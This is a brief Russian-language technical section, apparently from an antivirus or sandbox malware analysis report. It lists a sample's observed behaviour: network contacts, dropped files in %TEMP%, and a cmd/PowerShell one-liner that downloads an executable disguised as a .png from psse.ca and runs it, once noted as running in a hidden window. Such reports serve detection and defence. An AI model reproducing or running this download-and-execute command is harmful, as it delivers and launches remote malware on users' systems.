Техническая информация
- http://psse.ca/images/qmjjrccrhgw9sb6uf.png как %temp%\eqdnr.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://psse.ca/images/QMjJrcCrHGW9sb6uF.png','%TMP%\eqdnr.exe');Start-Process '%TMP%\eqdnr.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1908
- %TEMP%\1183782.cvr
- %TEMP%\eqdnr.exe
- 'ps#e.ca':80
- http://ps#e.ca/images/QMjJrcCrHGW9sb6uF.png
- DNS ASK ps#e.ca
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://psse.ca/images/QMjJrcCrHGW9sb6uF.png','%TMP%\eqdnr.exe');Start-Process '%TMP%\eqdnr.exe';' (со скрытым окном)